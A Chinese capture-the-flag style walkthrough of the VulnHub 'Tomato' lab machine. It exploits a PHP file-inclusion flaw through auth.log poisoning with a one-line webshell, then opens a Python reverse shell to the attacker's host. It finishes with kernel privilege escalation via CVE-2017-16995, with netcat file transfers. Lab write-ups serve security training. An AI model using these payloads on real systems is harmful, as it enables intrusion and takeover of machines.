VulnHub靶场渗透实战-Tomato
前言
特莫特来啦!
靶机下载地址:
靶机环境:Vmware
网络:NAT模式
靶场难度:中一难
结果:利用文件包含漏洞提权。
靶机IP:192.168.1.50 kali:192.168.137.133
1.信息收集
2.开放端口
3.既然开放了web端口,那看看它有什么咯。
4.发现存在目录遍历。
查看infoPHP文件的源码,文件包含的代码“include”。
4.漏洞利用
1.读取一下etc文件密码,读取成功,存在文件包含漏洞。
5.反弹shell
有文件包含漏洞,那该怎么利用呢? 思路就是往日志文件写入一句话木马,然后连接。 /var/log/auth.log记录了所有和用户认证相关的日志,无论是我们通过 ssh 登录,还是通过 sudo 执行命令都会在 auth.log 中产生记录。
利用 ssh 连接,写入一句话木马
ssh <?php system($_GET[1]);?>@192.168.137.133 -p 2211
查看是否被执行
http://192.168.1.50/antibot_image/antibots/info.php?image=/var/log/auth.log
nc开启监听
将url编码:python3 -c import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.137.133",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
其中以下语句是建立socket会话,然后反向连接(也可用PHP)
socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.137.133",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);
监听成功!
6.利用工具,检测本地存在哪些本地权限提升漏洞。利用CVE-2017-16995提权。
利用工具linux-exploit-suggester,能够检测Linux内核/基于Linux的机器存在哪些本地权限提升漏洞。
靶机:进入/tmp目录,开启监听。
nc -nvlp 8888 > linux-exp.sh
kali服务器:nc传输工具至目标靶机。
nc 192.168.137.133 8888 < linux-exploit-suggester.sh -w 1
下载地址:https://github.com/mzet-/linux-exploit-suggester
赋予工具权限:
chmod +x linux-exp.sh ./linux-exp.sh(运行之后会显示本地有哪些漏洞可提权)
在kali上检索此漏洞EXPsearchsploit -p 45010
因为此文件是一个C语言源码文件,需要编译才能够运行。
源码编译:gcc 45010.c -o exp 靶机监听:nc -nvlp 7777 > exp kali服务器:nc 192.168.137.133 7777 < exp -w 1 赋予权限:chmod +x linux-exp.sh 运行:./exp
7.把源码传输到靶机上,编译源码,靶机开启监听,kali开启监听。给exp赋予权限,运行exp,提权成功,查看flag。成功拿到falg。(完成!哦耶!)
上一篇:
Java架构师技术进阶路线图